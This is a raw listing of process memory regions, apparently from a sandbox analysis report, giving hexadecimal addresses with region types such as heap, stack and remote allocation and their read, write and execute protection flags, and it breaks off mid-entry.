386D000
trusted library allocation
page read and write
34E7000
trusted library allocation
page read and write
D40000
heap
page read and write
1B333000
heap
page read and write
77E5000
trusted library allocation
page read and write
6A71000
trusted library allocation
page read and write
37A6000
trusted library allocation
page read and write
7FF000E5000
trusted library allocation
page read and write
33F7000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
7FF0001A000
trusted library allocation
page execute and read and write
418000
heap
page read and write
1B50000
heap
page read and write
12D000
trusted library allocation
page execute and read and write
363C000
trusted library allocation
page read and write
7FF0003A000
trusted library allocation
page execute and read and write
DB000
stack
page read and write
1B470000
heap
page read and write
8E7000
heap
page read and write
4DF0000
trusted library allocation
page read and write
E40000
trusted library allocation
page read and write
20A0000
heap
page read and write
3890000
trusted library allocation
page read and write
720000
heap
page read and write
550000
heap
page read and write
7FF00022000
trusted library allocation
page execute and read and write
1A7000
trusted library allocation
page read and write
1CAB000
heap
page read and write
D44000
heap
page read and write
1CE0000
heap
page execute and read and write
3F5000
trusted library allocation
page read and write
50000
unkown
page readonly
80000
heap
page read and write
771C000
trusted library allocation
page read and write
523E000
stack
page read and write
5850000
trusted library allocation
page read and write
1F5000
stack
page read and write | page guard
20A0000
heap
page read and write
34A3000
trusted library allocation
page read and write
27CD000
trusted library allocation
page read and write
38E000
heap
page read and write
6B1000
heap
page read and write
870000
heap
page read and write
4E4000
heap
page read and write
5430000
trusted library allocation
page read and write
28DE000
stack
page read and write
2ABD000
trusted library allocation
page read and write
532F000
stack
page read and write
3875000
trusted library allocation
page read and write
562C000
stack
page read and write
7FF001A0000
trusted library allocation
page read and write
71CE000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
37AC000
trusted library allocation
page read and write
6A41000
trusted library allocation
page read and write
20BC000
heap
page read and write
3814000
trusted library allocation
page read and write
33AF000
trusted library allocation
page read and write
70B7000
trusted library allocation
page read and write
3786000
trusted library allocation
page read and write
3A0D000
trusted library allocation
page read and write
2E38000
trusted library allocation
page read and write
4E4E000
stack
page read and write
574C000
trusted library allocation
page read and write
186000
stack
page read and write
1B34F000
heap
page read and write
11A0000
trusted library allocation
page read and write
35D3000
trusted library allocation
page read and write
762A000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
7AFF000
trusted library allocation
page read and write
12F6000
trusted library allocation
page read and write
5F2A000
heap
page read and write
288D000
trusted library allocation
page read and write
1C0000
heap
page read and write
718E000
trusted library allocation
page read and write
5CD4000
heap
page read and write
5EF0000
trusted library allocation
page read and write
12C51000
trusted library allocation
page read and write
B00000
trusted library allocation
page read and write
914000
heap
page read and write
1C75000
heap
page read and write
2B7F000
trusted library allocation
page read and write
287E000
trusted library allocation
page read and write
558D000
stack
page read and write
343C000
trusted library allocation
page read and write
3979000
trusted library allocation
page read and write
120000
trusted library allocation
page read and write
E8E000
stack
page read and write
6BC000
heap
page read and write
2FA0000
trusted library allocation
page read and write
1254000
heap
page read and write
3983000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page read and write
3466000
trusted library allocation
page read and write
377000
heap
page read and write
37C6000
trusted library allocation
page read and write
33EC000
trusted library allocation
page read and write
717D000
trusted library allocation
page read and write
2D46000
trusted library allocation
page read and write
876000
heap
page read and write
55CE000
stack
page read and write
1B4C0000
trusted library allocation
page read and write
3017000
trusted library allocation
page read and write
5E90000
trusted library allocation
page read and write
3A07000
trusted library allocation
page read and write
1330000
unkown
page readonly
7141000
trusted library allocation
page read and write
5E4000
heap
page read and write
5860000
trusted library allocation
page read and write
50000
unkown
page readonly
5E0000
heap
page read and write
12DE1000
trusted library allocation
page read and write
3870000
trusted library allocation
page read and write
4920000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
20000
heap
page read and write
2F8F000
trusted library allocation
page read and write
5BB0000
trusted library allocation
page read and write
837000
heap
page read and write
1D44000
heap
page read and write
2F0C000
trusted library allocation
page read and write
12B91000
trusted library allocation
page read and write
7582000
trusted library allocation
page read and write
543E000
trusted library allocation
page read and write
2F1F000
trusted library allocation
page read and write
34AC000
trusted library allocation
page read and write
29F000
stack
page read and write
334000
heap
page read and write
2AC0000
heap
page execute and read and write
60000
unkown
page readonly
7FF00240000
trusted library allocation
page execute and read and write
4E00000
trusted library allocation
page execute and read and write
D02000
heap
page read and write
7171000
trusted library allocation
page read and write
3A17000
trusted library allocation
page read and write
5DA9000
unkown
page read and write
60000
unkown
page readonly
400000
remote allocation
page execute and read and write
2D85000
trusted library allocation
page read and write
67EE000
stack
page read and write
39E5000
trusted library allocation
page read and write
344A000
trusted library allocation
page read and write
2700000
trusted library allocation
page read and write
856000
heap
page read and write
820000
trusted library allocation
page read and write
2A9F000
stack
page read and write
6F35000
trusted library allocation
page read and write
37D6000
trusted library allocation
page read and write
4940000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
80F7000
trusted library allocation
page read and write
1320000
trusted library allocation
page execute and read and write
25B000
heap
page read and write
466000
heap
page read and write
C10000
trusted library allocation
page read and write
122000
heap
page read and write
7449000
trusted library allocation
page read and write
1B3F0000
heap
page read and write
6A2E000
stack
page read and write
665D000
trusted library allocation
page read and write
180000
heap
page read and write
2A00000
trusted library allocation
page read and write
55E5000
trusted library allocation
page read and write
784000
heap
page read and write
37C1000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
2E7C000
trusted library allocation
page read and write
C1A000
trusted library allocation
page read and write
12CDC000
trusted library allocation
page read and write
6640000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
7FF0010A000
trusted library allocation
page execute and read and write
C00000
trusted library allocation
page read and write
4F70000
heap
page read and write
10000
heap
page read and write
150000
heap
page read and write
2A80000
heap
page execute and read and write
3E0000
heap
page read and write
5A1D000
trusted library allocation
page read and write
2F88000
trusted library allocation
page read and write
35BA000
trusted library allocation
page read and write
3100000
trusted library allocation
page read and write
7365000
trusted library allocation
page read and write
CDC000
stack
page read and write
50000
unkown
page readonly
5500000
trusted library allocation
page execute and read and write
3932000
heap
page read and write
193000
trusted library allocation
page execute and read and write
67C5000
trusted library allocation
page read and write
553000
remote allocation
page execute and read and write
12DC1000
trusted library allocation
page read and write
2910000
heap
page read and write
744000
heap
page read and write
2D8C000
trusted library allocation
page read and write
392E000
trusted library allocation
page read and write
57E0000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page execute and read and write
5850000
trusted library allocation
page read and write
6B11000
trusted library allocation
page read and write
301E000
trusted library allocation
page read and write
3811000
trusted library allocation
page read and write
1F40000
trusted library allocation
page read and write
1B4BA000
heap
page read and write
419000
remote allocation
page execute and read and write
727000
heap
page read and write
305E000
trusted library allocation
page read and write
50000
unkown
page readonly
4E00000
trusted library allocation
page read and write
5560000
heap
page read and write
12E40000
trusted library allocation
page read and write
6B2000
heap
page read and write
55E7000
trusted library allocation
page read and write
2E9E000
trusted library allocation
page read and write
31F2000
trusted library allocation
page read and write
7402000
trusted library allocation
page read and write
71FF000
trusted library allocation
page read and write
3E0000
heap
page read and write
2F7E000
trusted library allocation
page read and write
110000
trusted library allocation
page read and write
130E000
trusted library allocation
page read and write
3450000
trusted library allocation
page read and write
1BC000
stack
page read and write
1C7000
trusted library allocation
page execute and read and write
2E60000
trusted library allocation
page read and write
6ECE000
stack
page read and write
7FF0024B000
trusted library allocation
page execute and read and write
1B0000
heap
page execute and read and write
1CA7000
heap
page read and write
5A2E000
stack
page read and write
880000
trusted library allocation
page read and write
1BB30000
heap
page read and write
35E7000
trusted library allocation
page read and write
5CF0000
heap
page read and write
3DF000
stack
page read and write
1F6000
stack
page read and write
7FF00020000
trusted library allocation
page read and write
4E8E000
stack
page read and write
38C0000
trusted library allocation
page read and write
39BC000
trusted library allocation
page read and write
80F3000
trusted library allocation
page read and write
385E000
trusted library allocation
page read and write
1E47000
heap
page read and write
4DF0000
trusted library allocation
page read and write
C00000
trusted library allocation
page read and write
6A97000
trusted library allocation
page read and write
C10000
trusted library allocation
page execute and read and write
CB000
stack
page read and write
4DF0000
trusted library allocation
page read and write
50000
unkown
page readonly
53A0000
trusted library allocation
page read and write
384E000
trusted library allocation
page read and write
3328000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
2E15000
trusted library allocation
page read and write
303F000
trusted library allocation
page read and write
1C843000
heap
page read and write
2FBA000
trusted library allocation
page read and write
5729000
trusted library allocation
page read and write
595F000
heap
page read and write
3AC1000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
3A61000
trusted library allocation
page read and write
73A8000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
A80000
trusted library allocation
page read and write
6F67000
trusted library allocation
page read and write
560000
trusted library allocation
page read and write
2D5C000
trusted library allocation
page read and write
B30000
trusted library allocation
page read and write
5DA6000
unkown
page read and write
244F000
unkown
page read and write
8B0E000
stack
page read and write
10000
heap
page read and write
20000
heap
page read and write
229D000
stack
page read and write
7FF00180000
trusted library allocation
page execute and read and write
D80000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
54D000
remote allocation
page execute and read and write
5A37000
trusted library allocation
page read and write
2E28000
trusted library allocation
page read and write
215000
trusted library allocation
page read and write
386A000
trusted library allocation
page read and write
880000
trusted library allocation
page read and write
530000
heap
page read and write
12B6C000
trusted library allocation
page read and write
838000
heap
page read and write
6F0A000
trusted library allocation
page read and write
2D02000
trusted library allocation
page read and write
5958000
heap
page read and write
52BE000
stack
page read and write
7FF00040000
trusted library allocation
page read and write
56D6000
trusted library allocation
page read and write
2EFF000
trusted library allocation
page read and write
55D0000
trusted library allocation
page read and write
700000
heap
page read and write
3779000
trusted library allocation
page read and write
39D2000
trusted library allocation
page read and write
CE0000
heap
page read and write
317000
heap
page read and write
E00000
trusted library allocation
page read and write
60000
unkown
page readonly
530E000
stack
page read and write | page guard
1AD10000
trusted library allocation
page read and write
344D000
trusted library allocation
page read and write
7D3000
heap
page read and write
185000
heap
page read and write
12D2000
heap
page read and write
D62000
heap
page read and write
2933000
trusted library allocation
page read and write
CAC000
stack
page read and write
35A1000
trusted library allocation
page read and write
3875000
trusted library allocation
page read and write
7044000
trusted library allocation
page read and write
3407000
trusted library allocation
page read and write
6FC6000
trusted library allocation
page read and write
2F09000
trusted library allocation
page read and write
360B000
trusted library allocation
page read and write
35D0000
trusted library allocation
page read and write
5788000
trusted library allocation
page read and write
74D000
heap
page read and write
71D5000
trusted library allocation
page read and write
7FF000D2000
trusted library allocation
page execute and read and write
3B37000
trusted library allocation
page read and write
E10000
trusted library allocation
page read and write
49A9000
trusted library allocation
page read and write
6D8000
heap
page read and write
1B44000
heap
page read and write
39F1000
trusted library allocation
page read and write
567B000
trusted library allocation
page read and write
5440000
heap
page read and write
707F000
trusted library allocation
page read and write
39EB000
trusted library allocation
page read and write
3A0D000
trusted library allocation
page read and write
2F76000
trusted library allocation
page read and write
76A000
heap
page read and write
5310000
trusted library allocation
page read and write
401000
remote allocation
page execute and read and write
90AE000
stack
page read and write
5CF2000
heap
page read and write
75B8000
trusted library allocation
page read and write
760000
heap
page read and write
3008000
trusted library allocation
page read and write
37FA000
trusted library allocation
page read and write
3187000
trusted library allocation
page read and write
605E000
stack
page read and write | page guard
3068000
trusted library allocation
page read and write
72AF000
stack
page read and write
2B2F000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
6FCD000
trusted library allocation
page read and write
394000
heap
page read and write
3877000
trusted library allocation
page read and write
7202000
trusted library allocation
page read and write
230000
heap
page read and write
1B39C000
heap
page read and write
5250000
trusted library allocation
page read and write
7FF00030000
trusted library allocation
page read and write
6E40000
trusted library allocation
page read and write
60000
unkown
page readonly
4F0E000
stack
page read and write
2ED8000
trusted library allocation
page read and write
701E000
stack
page read and write
1E80000
heap
page execute and read and write
10B000
stack
page read and write
2880000
trusted library allocation
page read and write
3954000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
1C90000
heap
page read and write
27C5000
trusted library allocation
page read and write
714E000
trusted library allocation
page read and write
2B41000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
350000
trusted library allocation
page read and write
9D3000
trusted library allocation
page read and write
2889000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
10A000
heap
page read and write
1320000
trusted library allocation
page read and write
3C0000
heap
page read and write
6AFE000
trusted library allocation
page read and write
370000
heap
page read and write
1B365000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
1BA6000
heap
page read and write
767B000
trusted library allocation
page read and write
2CE3000
trusted library allocation
page read and write
7673000
trusted library allocation
page read and write
2E86000
trusted library allocation
page read and write
2E0C000
trusted library allocation
page read and write
928000
trusted library allocation
page read and write
12D50000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
30FE000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
67C7000
trusted library allocation
page read and write
1B46D000
stack
page read and write
4DF0000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
7A91000
trusted library allocation
page read and write
1310000
trusted library allocation
page read and write
73EE000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
1240000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
C00000
trusted library allocation
page execute and read and write
5410000
trusted library allocation
page read and write
5F5000
heap
page read and write
6F8F000
trusted library allocation
page read and write
BF0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
3838000
trusted library allocation
page read and write
1F00000
heap
page read and write
4950000
trusted library allocation
page read and write
7AD000
heap
page read and write
3436000
trusted library allocation
page read and write
7EA000
heap
page read and write
1DA000
stack
page read and write
1B4B4000
trusted library allocation
page read and write
2990000
heap
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
6DCE000
stack
page read and write | page guard
C1F000
trusted library allocation
page read and write
840000
heap
page read and write
C8D000
stack
page read and write
8A6E000
stack
page read and write
3831000
trusted library allocation
page read and write
15B000
trusted library allocation
page execute and read and write
AEE000
stack
page read and write
12D000
trusted library allocation
page execute and read and write
7FF000F0000
trusted library allocation
page read and write
6ED000
heap
page read and write
709E000
trusted library allocation
page read and write
67A8000
trusted library allocation
page read and write
1327000
trusted library allocation
page read and write
343A000
trusted library allocation
page read and write
3C4000
heap
page read and write
217000
heap
page read and write
2D68000
trusted library allocation
page read and write
12CB5000
trusted library allocation
page read and write
7195000
trusted library allocation
page read and write
4D5E000
stack
page read and write
C20000
trusted library allocation
page read and write
206D000
stack
page read and write
7575000
trusted library allocation
page read and write
FDE000
unkown
page read and write
7FF00160000
trusted library allocation
page execute and read and write
75C4000
trusted library allocation
page read and write
1B420000
trusted library allocation
page read and write
24D2000
heap
page read and write
284F000
stack
page read and write
2DD0000
trusted library allocation
page read and write
7FF001E7000
trusted library allocation
page read and write
870000
heap
page read and write
BCF000
stack
page read and write
75E8000
trusted library allocation
page read and write
20A5000
heap
page read and write
34F000
stack
page read and write
57FD000
trusted library allocation
page read and write
82A000
trusted library allocation
page read and write
12DB2000
trusted library allocation
page read and write
5E40000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
75AE000
trusted library allocation
page read and write
F0000
heap
page execute and read and write
6B8E000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
3892000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
34AA000
trusted library allocation
page read and write
4DAE000
stack
page read and write
7FF00190000
trusted library allocation
page execute and read and write
858000
heap
page read and write
7136000
trusted library allocation
page read and write
1330000
unkown
page readonly
7FF00210000
trusted library allocation
page execute and read and write
260000
heap
page read and write
310000
heap
page read and write
C10000
trusted library allocation
page read and write
5565000
heap
page read and write
7FF00190000
trusted library allocation
page execute and read and write
5A10000
unkown
page read and write
37F3000
trusted library allocation
page read and write
2D86000
trusted library allocation
page read and write
24DE000
stack
page read and write
C30000
trusted library allocation
page read and write
7EE000
heap
page read and write
12F00000
trusted library allocation
page read and write
712A000
trusted library allocation
page read and write
12B000
stack
page read and write
C10000
trusted library allocation
page read and write
1CA70000
heap
page read and write
38EF000
trusted library allocation
page read and write
8B000
stack
page read and write
60000
unkown
page readonly
9D0000
trusted library allocation
page read and write
7FF0004C000
trusted library allocation
page execute and read and write
7FF00100000
trusted library allocation
page read and write
35A7000
trusted library allocation
page read and write
30A5000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
714B000
trusted library allocation
page read and write
C15000
trusted library allocation
page read and write
3078000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
2FB9000
trusted library allocation
page read and write
2FE9000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page read and write
2EAA000
trusted library allocation
page read and write
2EF000
unkown
page read and write
20000
heap
page read and write
3756000
trusted library allocation
page read and write
10000
heap
page read and write
1C6CE000
stack
page read and write
2FE0000
trusted library allocation
page read and write
341D000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
190000
trusted library allocation
page read and write
7FF001F7000
trusted library allocation
page read and write
1B7000
trusted library allocation
page execute and read and write
7FF00022000
trusted library allocation
page execute and read and write
5B4D000
trusted library allocation
page read and write
5C0000
heap
page read and write
2877000
trusted library allocation
page read and write
31CE000
trusted library allocation
page read and write
3A4C000
trusted library allocation
page read and write
12C90000
trusted library allocation
page read and write
4E0000
heap
page read and write
2928000
trusted library allocation
page read and write
2A0000
heap
page read and write
F8E000
stack
page read and write
1B86000
heap
page read and write
1B9000
heap
page read and write
6F64000
trusted library allocation
page read and write
600000
heap
page read and write
29B000
stack
page read and write
491D000
stack
page read and write
2A4F000
stack
page read and write
3890000
trusted library allocation
page read and write
33E7000
trusted library allocation
page read and write
7133000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
1BA20000
trusted library allocation
page read and write
414000
remote allocation
page execute and read and write
3038000
trusted library allocation
page read and write
5C39000
trusted library allocation
page read and write
555E000
stack
page read and write
20DB000
heap
page read and write
7FF000F5000
trusted library allocation
page read and write
30A7000
trusted library allocation
page read and write
7279000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
724000
heap
page read and write
7FF00170000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page read and write
12D41000
trusted library allocation
page read and write
10000
heap
page read and write
1F00000
heap
page read and write
7FF00042000
trusted library allocation
page execute and read and write
6FCA000
trusted library allocation
page read and write
7C4000
heap
page read and write
ACE000
stack
page read and write
C20000
trusted library allocation
page read and write
100000
heap
page read and write
2946000
heap
page read and write
50000
unkown
page readonly
4920000
trusted library allocation
page read and write
5670000
trusted library allocation
page read and write
5F00000
trusted library allocation
page execute and read and write
3420000
trusted library allocation
page read and write
2D3D000
trusted library allocation
page read and write
37F8000
trusted library allocation
page read and write
80D6000
trusted library allocation
page read and write
39E5000
trusted library allocation
page read and write
37EE000
trusted library allocation
page read and write
4DEE000
stack
page read and write
7A2A000
trusted library allocation
page read and write
17B000
heap
page read and write
7A40000
trusted library allocation
page read and write
1B430000
heap
page read and write
1B4E4000
heap
page read and write
60000
unkown
page readonly
D6E000
stack
page read and write
679F000
stack
page read and write
3218000
trusted library allocation
page read and write
726F000
stack
page read and write
7FF000E0000
trusted library allocation
page read and write
35E9000
trusted library allocation
page read and write
2E12000
trusted library allocation
page read and write
10A000
heap
page read and write
9E0000
trusted library allocation
page read and write
726A000
trusted library allocation
page read and write
3582000
trusted library allocation
page read and write
37B2000
trusted library allocation
page read and write
355C000
trusted library allocation
page read and write
2DBE000
trusted library allocation
page read and write
A70000
trusted library allocation
page read and write
2210000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
304C000
trusted library allocation
page read and write
F0000
heap
page read and write
E8E000
stack
page read and write | page guard
340A000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page read and write
5970000
heap
page read and write
6E3F000
stack
page read and write
AD6000
trusted library allocation
page read and write
7FF000E2000
trusted library allocation
page execute and read and write
6FDE000
stack
page read and write
E20000
trusted library allocation
page read and write
3914000
heap
page read and write
396F000
trusted library allocation
page read and write
1B387000
heap
page read and write
C90000
trusted library allocation
page read and write
217B000
heap
page read and write
258000
heap
page read and write
1A0000
trusted library allocation
page read and write
7FF00150000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
1250000
heap
page read and write
110000
trusted library allocation
page read and write
1310000
trusted library allocation
page read and write
7A04000
trusted library allocation
page read and write
3460000
trusted library allocation
page read and write
12F0000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
71B8000
trusted library allocation
page read and write
AF0000
heap
page read and write
2E1B000
trusted library allocation
page read and write
7627000
trusted library allocation
page read and write
3888000
trusted library allocation
page read and write
37BC000
trusted library allocation
page read and write
100000
heap
page read and write
5737000
trusted library allocation
page read and write
2FFA000
trusted library allocation
page read and write
1BA20000
trusted library allocation
page read and write
2ACA000
heap
page execute and read and write
4EE000
stack
page read and write | page guard
3910000
heap
page read and write
7187000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
830000
heap
page read and write
5ED0000
trusted library allocation
page read and write
BF0000
trusted library allocation
page read and write
7563000
trusted library allocation
page read and write
419000
remote allocation
page execute and read and write
385A000
trusted library allocation
page read and write
760000
heap
page read and write
2E95000
trusted library allocation
page read and write
2A8A000
heap
page execute and read and write
D80000
trusted library allocation
page read and write
2FFE000
trusted library allocation
page read and write
6D9000
heap
page read and write
20B3000
heap
page read and write
27BE000
stack
page read and write
CE4000
heap
page read and write
12F20000
trusted library allocation
page read and write
DCE000
stack
page read and write
1B3ED000
stack
page read and write
2E70000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page execute and read and write
2EDB000
trusted library allocation
page read and write
2DC5000
trusted library allocation
page read and write
3E4000
heap
page read and write
6EEC000
trusted library allocation
page read and write
721B000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
D80000
trusted library allocation
page read and write
7534000
trusted library allocation
page read and write
5817000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
70B0000
trusted library allocation
page read and write
6BD000
heap
page read and write
7FF00207000
trusted library allocation
page read and write
2866000
trusted library allocation
page read and write
12DF2000
trusted library allocation
page read and write
4D80000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
13C000
heap
page read and write
5EDE000
stack
page read and write
17A000
stack
page read and write
12FD000
stack
page read and write
2C30000
heap
page execute and read and write
29B000
stack
page read and write
5750000
trusted library allocation
page read and write
12FD000
trusted library allocation
page read and write
2DF8000
trusted library allocation
page read and write
2E54000
trusted library allocation
page read and write
6CAE000
stack
page read and write
DD0000
trusted library allocation
page read and write
2871000
trusted library allocation
page read and write
C00000
trusted library allocation
page read and write
C0A000
trusted library allocation
page read and write
9E0000
trusted library allocation
page read and write
123000
trusted library allocation
page execute and read and write
57D6000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
2CD8000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
7056000
trusted library allocation
page read and write
C28000
trusted library allocation
page read and write
142000
trusted library allocation
page read and write
1C94000
heap
page read and write
3572000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
286F000
stack
page read and write
276000
stack
page read and write
568A000
trusted library allocation
page read and write
581D000
trusted library allocation
page read and write
1C0000
heap
page read and write
32E8000
trusted library allocation
page read and write
3255000
trusted library allocation
page read and write
560000
trusted library allocation
page read and write
310000
heap
page read and write
1C49E000
stack
page read and write
2B0000
trusted library allocation
page execute and read and write
12F0000
trusted library allocation
page read and write
44F000
heap
page read and write
2E2C000
trusted library allocation
page read and write
1320000
trusted library allocation
page read and write
2906000
heap
page read and write
1190000
trusted library section
page read and write
71C1000
trusted library allocation
page read and write
5D40000
unkown
page read and write
48DC000
stack
page read and write
192000
trusted library allocation
page read and write
C9E000
trusted library allocation
page read and write
12E80000
trusted library allocation
page read and write
383E000
trusted library allocation
page read and write
3423000
trusted library allocation
page read and write
267000
heap
page read and write
1BA20000
remote allocation
page read and write
39EE000
trusted library allocation
page read and write
323D000
trusted library allocation
page read and write
2E30000
trusted library allocation
page read and write
AE0000
trusted library allocation
page read and write
200000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
660000
heap
page read and write
5706000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
5880000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page execute and read and write
2E64000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
3A6B000
trusted library allocation
page read and write
366000
heap
page read and write
386D000
trusted library allocation
page read and write
712E000
trusted library allocation
page read and write
54D000
remote allocation
page execute and read and write
D30000
heap
page execute and read and write
10000
heap
page read and write
5620000
trusted library allocation
page read and write
4830000
trusted library allocation
page read and write
59CD000
trusted library allocation
page read and write
B7F000
trusted library allocation
page read and write
3967000
trusted library allocation
page read and write
2DDF000
trusted library allocation
page read and write
57D000
trusted library allocation
page read and write
2E8C000
trusted library allocation
page read and write
2A4E000
stack
page read and write | page guard
C15000
trusted library allocation
page read and write
6F93000
trusted library allocation
page read and write
38EB000
trusted library allocation
page read and write
2DEC000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
38F0000
trusted library allocation
page read and write
2EB1000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page execute and read and write
38F6000
trusted library allocation
page read and write
50000
unkown
page readonly
28E0000
heap
page read and write
2CB1000
trusted library allocation
page read and write
38D2000
trusted library allocation
page read and write
3854000
trusted library allocation
page read and write
4950000
trusted library allocation
page read and write
2FD6000
trusted library allocation
page read and write
372F000
stack
page read and write
147000
trusted library allocation
page execute and read and write
7A80000
trusted library allocation
page read and write
3067000
trusted library allocation
page read and write
1E60000
heap
page execute and read and write
3476000
trusted library allocation
page read and write
307B000
trusted library allocation
page read and write
204000
heap
page read and write
27C0000
trusted library allocation
page read and write
59F4000
trusted library allocation
page read and write
4D60000
trusted library allocation
page read and write
150000
heap
page read and write
5D3E000
stack
page read and write
3857000
trusted library allocation
page read and write
2D2B000
trusted library allocation
page read and write
37EF000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
39CF000
trusted library allocation
page read and write
1B210000
heap
page read and write
5950000
heap
page read and write
6A5B000
trusted library allocation
page read and write
12C11000
trusted library allocation
page read and write
3126000
trusted library allocation
page read and write
766B000
trusted library allocation
page read and write
7FF00105000
trusted library allocation
page read and write
7FF0023B000
trusted library allocation
page execute and read and write
C00000
trusted library allocation
page read and write
6EE000
heap
page read and write
3613000
trusted library allocation
page read and write
2F7A000
trusted library allocation
page read and write
12F0000
trusted library allocation
page read and write
1CC5000
heap
page read and write
2E3C000
trusted library allocation
page read and write
57D9000
trusted library allocation
page read and write
380E000
trusted library allocation
page read and write
35E6000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
1E80000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
6B7000
heap
page read and write
5AB0000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
60000
unkown
page readonly
10E000
heap
page read and write
C10000
trusted library allocation
page read and write
6E9A000
trusted library allocation
page read and write
566D000
stack
page read and write
38A1000
trusted library allocation
page read and write
10000
heap
page read and write
3805000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
1B2000
trusted library allocation
page read and write
1BA2A000
trusted library allocation
page read and write
7FF00012000
trusted library allocation
page execute and read and write
820000
trusted library allocation
page execute and read and write
7FF001C0000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
9F0000
heap
page execute and read and write
7FF00190000
trusted library allocation
page read and write
5FF000
trusted library allocation
page read and write
2E4C000
trusted library allocation
page read and write
1B4BA000
trusted library allocation
page read and write
12B51000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
340D000
trusted library allocation
page read and write
2DAB000
trusted library allocation
page read and write
11A0000
trusted library allocation
page read and write
3ABF000
stack
page read and write
2C7A000
heap
page execute and read and write
2FBE000
trusted library allocation
page read and write
6B1000
heap
page read and write
5F30000
heap
page read and write
530F000
stack
page read and write
22BF000
unkown
page read and write
5260000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page read and write
353F000
stack
page read and write
35B7000
trusted library allocation
page read and write
5647000
trusted library allocation
page read and write
75A5000
trusted library allocation
page read and write
2E28000
trusted library allocation
page read and write
497F000
stack
page read and write
75B0000
trusted library allocation
page read and write
33AC000
trusted library allocation
page read and write
197000
trusted library allocation
page execute and read and write
460000
heap
page read and write
53A0000
heap
page read and write
3831000
trusted library allocation
page read and write
286F000
trusted library allocation
page read and write
616F000
stack
page read and write
24E000
unkown
page read and write
7FF00032000
trusted library allocation
page execute and read and write
2B00000
heap
page execute and read and write
4D0000
heap
page read and write
448000
stack
page read and write
3833000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
160000
heap
page read and write
9E0000
trusted library allocation
page read and write
2EAB000
trusted library allocation
page read and write
D8000
heap
page read and write
6740000
trusted library allocation
page read and write
2D4C000
trusted library allocation
page read and write
200000
heap
page read and write
AF9000
heap
page read and write
6F05000
trusted library allocation
page read and write
7FF000F0000
trusted library allocation
page read and write
9D5000
trusted library allocation
page read and write
50A000
heap
page read and write
12CB1000
trusted library allocation
page read and write
3802000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page read and write
2A15000
trusted library allocation
page read and write
20B000
stack
page read and write
2ED2000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
2E1F000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
2EE8000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page execute and read and write
71C4000
trusted library allocation
page read and write
33F1000
trusted library allocation
page read and write
2DA8000
trusted library allocation
page read and write
23B4000
heap
page read and write
60000
unkown
page readonly
338000
stack
page read and write
2E8D000
trusted library allocation
page read and write
5270000
trusted library allocation
page read and write
1B442000
heap
page read and write
15D000
stack
page read and write
2EEB000
trusted library allocation
page read and write
2843000
